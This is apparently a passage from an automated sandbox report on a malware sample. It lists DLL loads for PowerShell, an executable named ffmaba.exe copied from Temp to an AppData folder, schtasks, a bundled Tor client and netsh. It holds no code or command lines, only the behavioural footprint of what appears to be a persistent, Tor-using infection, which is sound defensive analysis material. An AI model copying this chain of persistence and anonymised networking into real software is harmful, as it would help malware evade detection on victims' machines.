                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: httpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libevent-2-1-7.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libssp-0.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libssp-0.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libgcc_s_sjlj-1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libwinpthread-1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libwinpthread-1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libcrypto-1_1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: libssl-1_1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: zlib1.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
